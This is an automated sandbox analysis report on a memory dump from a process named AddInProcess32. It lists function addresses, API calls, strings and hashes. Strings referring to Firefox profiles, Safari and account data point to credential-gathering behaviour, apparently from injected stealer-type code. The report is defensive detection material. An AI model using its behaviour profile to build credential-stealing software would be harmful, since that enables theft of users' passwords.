                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1936579350-0
                                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                  Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                  Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                  Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                  Non-executed Functions

                                                                                                  Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                  • String ID:
                                                                                                  • API String ID: 3604893535-0
                                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                  Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1213725291-0
                                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                  • free.MSVCRT ref: 00418370
                                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                  Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1865533344-0
                                                                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                  Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Version
                                                                                                  • String ID:
                                                                                                  • API String ID: 1889659487-0
                                                                                                  • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                  • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                  • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                  Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: NtdllProc_Window
                                                                                                  • String ID:
                                                                                                  • API String ID: 4255912815-0
                                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                  • API String ID: 577499730-1134094380
                                                                                                  • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                  • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                  Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                  Strings
                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                  • String ID:
                                                                                                  • API String ID: 829165378-0
                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                  Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
